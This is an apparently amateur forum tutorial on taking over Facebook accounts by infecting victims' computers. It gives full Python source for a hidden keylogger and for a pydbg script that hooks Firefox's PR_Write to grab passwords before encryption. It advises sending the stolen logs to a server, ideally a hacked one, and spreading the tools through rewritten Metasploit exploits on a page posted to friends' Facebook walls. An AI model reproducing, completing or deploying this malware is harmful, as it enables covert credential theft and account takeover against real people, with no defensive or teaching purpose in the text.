This article is adressed to people that are developers.
Face it, if you don't write your own hacker tools you are not an hacker.
Not in my world. You are an scriptkiddie that uses other peoples tools.
It's nothing wrong with that you need to start somewhere, propably my early
years in the world of hacking, and I was as a scriptkiddie i hacked more computers on a day that I do today do on a year. This because as a scriptkiddie you have alot of freetime, you will also find a method that works, and then you search for the net after vurnerable servers that you can apply that method on. Today I don't even hack that much because I'm more intressted in the knowledge then to break in somewhere.
The power to be an real hacker is that you can write your own tools that adress just the computer you want to hack. Today I gona discuss my truth what I believe is the easiest ways to hack socialnetworks. This because many starters seams intressted in this atleast what I can read on many computer forums. Guess they feel more power if they can hack there friends and enemies accounts on a socialnetwork then a server that they have no connection to.
Hack Facebook method: 1 )
Is harder to attack the whole facebook site. So thats why you attack the victim directly that has less security and probably easy to fool with socialenginering if this is required. So this is methods apply on attack your victim directly.
As a scriptkiddie propably the easiet way is to trick him to be infected with an RAT tool ( Remote Administration Tool ). Problem with this is that many users have antivirus programs that will detect this, this also require some socialenginering to get this to work. Thats why we need to write this tool ourself.
Best way to think as a sucessfull hacker my opinion is the KISS ( Keep IT Simple Stupid ) mindset. So think first what is our goal, what do we want to accomplish.
Then we write tools that adress this.
This case our goal is to have the user password so we can login on his account.
To acomplish this we write an RAT ourself but because we use the KISS mindset and are sure what our goal is. We just write an RAT that saves his password and send it to us when he login on facebook, all other functionallity is unintressted. Less functions less detected by an antivirus program, and It's easy to write a program that do one thing and does it well. An experienced user will know that actaully this is not an RAT at all anymore it's an keylogger, and yes it is!
Ok, lets start build this keylogger. I would choose python as language. Thats because its really easy to write hacker tools in python and it's a scripting language so you don't need to compile also easier to work with when you are testing, and it's possible to create an executeble file later when needed. You will also need an server where your program will send the passwords to you when the user have logged in. Best ofcourse if the server is hacked so there is no connection if someone investigate where the passwords are sent, but because this attacks no company servers you are probably more save except your victims will hate you if they find out.
I will not share whole my code here because I don't want any scriptkiddies to use it.
Just want to share this method to the ones that want to know, and they can write there tools themself. I will share some example codes that show how this could be accomplish just as examples. This a simple keylogger as example
#----------------------------------------
# Simple Keylogger 1.0 Wrote by nighter
# Purpose: I needed a simple and easy
# Keylogger this was the solution.
# Revision: 1.0
#----------------------------------------
# load all modules
import pythoncom,pyHook,datetime,win32api,win32console,win32gui,os,sys
win = win32console.GetConsoleWindow()
# Make window invicible
win32gui.ShowWindow(win,0)
#--------------------------------------------
# Config Section
#-------------------------------------------
LOGGFILE="c:\\keylogg.txt"
#-------------------------------------------
# Function: OnKeyboardEvent
# Arguments: event
# Purpose: catch keyboardevents
#------------------------------------------
def OnKeyboardEvent(event):
mylog_file = open(LOGGFILE,"a")
# Problem with return and space so i handle
# Them seperatly.
if event.Key == "Return":
mylog_file.write(chr(10))
elif event.Key == "Space":
mylog_file.write(chr(32))
else:
# Convert and write all other chars.
mylog_file.write(chr(event.Ascii))
mylog_file.close()
return True
#------------------------------------------
# Check that only one instance is running
#------------------------------------------
needle=0
f = os.popen("tasklist","r")
for l in f.xreadlines():
if "python.exe" in l: needle=needle+1
# Quit if another instance is running
if needle > 1:
win32api.PostQuitMessage()
# Write timestamp
mylog_file = open(LOGGFILE,"a")
n = datetime.datetime.now()
mylog_file.write(str(n))
mylog_file.write(chr(10))
mylog_file.write("--------------------------")
mylog_file.write(chr(10))
mylog_file.close()
# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
Very simple but it's just to give you an clue how to do this. Then you need
to add some clever socket code that send the keylogger file to your server sometimes so you could review it. Problem with this is that it will log alot amount of data that are not intressted and more detecteble when it sends the file to you because of this. If the goal is just to access facebook, is better if it logs just the facebook password and sent it to you, to accomplish this is better to software hook functions in the victims webbrowser. You can do that like this.
( Example on firefox )
from pydbg import *
from pydbg.defines import *
import struct
import utils
import sys
dbg = pydbg()
found_firefox = False
# Let's set a global pattern that we can make the hook
# search for
pattern = "password"
# We take in the dbg instance, which also contains all
# of our register contexts, and a list[] of arguments that
# we hooked, the one we are interested in is args[1]
def ssl_sniff( dbg, args ):
# Now we read out the memory pointed to by the second argument
# it is stored as an ASCII string, so we'll loop on a read until
# we reach a NULL byte
buffer = ""
offset = 0
while 1:
byte = dbg.read_process_memory( args[1] + offset, 1 )
if byte != "\x00":
buffer += byte
offset += 1
continue
else:
break
if pattern in buffer:
print "Pre-Encrypted: %s" % buffer
return DBG_CONTINUE
# Quick and dirty process enumeration to find firefox.exe
for (pid, name) in dbg.enumerate_processes():
if name.lower() == "firefox.exe":
found_firefox = True
hooks = utils.hook_container()
dbg.attach(pid)
print "[*] Attaching to firefox.exe with PID: %d" % pid
# Resolve the function address
hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
if hook_address:
# Add the hook to the container, we aren't interested
# in using an exit callback so we set it to None
hooks.add( dbg, hook_address, 2, ssl_sniff, None)
print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
break
else:
print "[*] Error: Couldn't resolve hook address."
sys.exit(-1)
if found_firefox:
print "[*] Hooks set, continuing process."
dbg.run()
else:
print "[*] Error: Couldn't find the firefox.exe process. Please fire up firefox first."
sys.exit(-1)
Ok, so you have now write your tools, next problem is to get this tool installed on the victims computer. To do this I like to use exploits to infect the victim with my tools. I love the "metasploit project" is an tool thats up to date with the latest security holes. You don't need to keep track because they do it for you with alot of allredy written exploit modules. So i often check this and rewritte there modules to be able to infect an computer with your tools. Easiest if setup and webbserver with aproporate exploit modules rewritten from metasploit that infect the victim when they visit your homepage.
So now you can paste your homepage address on the facebook wall, and watch slowly how your friends password starting to get sent to your server.
This is maybe not etical correctly if you do this because your propably have no friends left if you are hacking there privatelife, but this a simple demostration how to hack FB. What you do with this information is up to you.
